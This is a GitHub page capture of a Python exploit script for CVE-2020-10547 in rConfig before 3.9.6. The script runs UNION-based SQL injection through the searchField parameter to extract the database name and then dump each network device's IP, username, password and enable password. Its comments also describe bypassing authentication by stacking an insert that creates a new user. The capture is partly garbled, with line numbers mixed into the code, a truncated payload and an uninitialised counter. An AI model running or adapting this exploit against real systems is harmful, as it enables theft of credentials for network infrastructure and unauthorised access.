☐ theguly / exploits Public ... ሦ master ▼ exploits / CVE-2020-10547.py / <> Jump to ▼ theguly rconfig History Αλ 1 contributor 68 lines (57 sloc) | 2.3 KB ... 1 #!/usr/bin/python3 # CVE-2020-10547 # author https://github.com/theguly/ 5 # this method is very similar to one already published by v1klngfr for his CVE-2020-10220 (https://github.com/v1klngfr/exploits-rconfig) # as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user # i wanted to have different py script foreach CVE, to have a proper listing on github. # i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it. 11 # tested with rConfig < 3.9.6 12 13 import sys 14 import requests 15 burl = """/compliancepolicyelements.inc.php?search=True&searchField=antani'+%s&searchColumn=elementName&searchOption=contains""" 18 ulen = 5 19 20 21 if len(sys.argv) < 2:</pre> 22 print('use: ./{} target'.format(sys.argv[0])) 23 $\texttt{print('./\{} \ \texttt{https://1.2.3.4/'.format(sys.argv[0]))}$ 24 sys.exit() 25 url = sys.argv[1] + burl 26 27 s = requests.Session() 28 s.verify = False

30 31 def getInfo(purl): 32 r = s.get(purl) if '[PWN]' in str(r.text): 33 ret = str(r.text).split('[PWN]')[1] 34 return ret 36 else: 37 return False 38 def askContinue(msg): 39 c = input('[-] '+msg+' (Y/n)') 40 41 if 'n' in c.lower(): 42 sys.exit() 43 44 # find current db name print("[+] extracting rconfig db: ",end='') 45 payload = "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" * (ulen - 1) + "+--+" 46 purl = url % payload 48 dbname = getInfo(purl) 49 print(dbname) 50 # dump all devices ip,username,password,enablepass 51 print("[+] dumping nodes: ") 52 53 print('devicename:ip:username:password:enablepass') 55 56 while True: if i > 0 and not i % 10: 57 58 askContinue('Continue?') 59 payload ="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3 61 purl = url % payload 62 n = getInfo(purl)63 if not n: askContinue('it could be possible that we don\'t have more devices, continue?') 64 65 print(n) i = i + 168 sys.exit()

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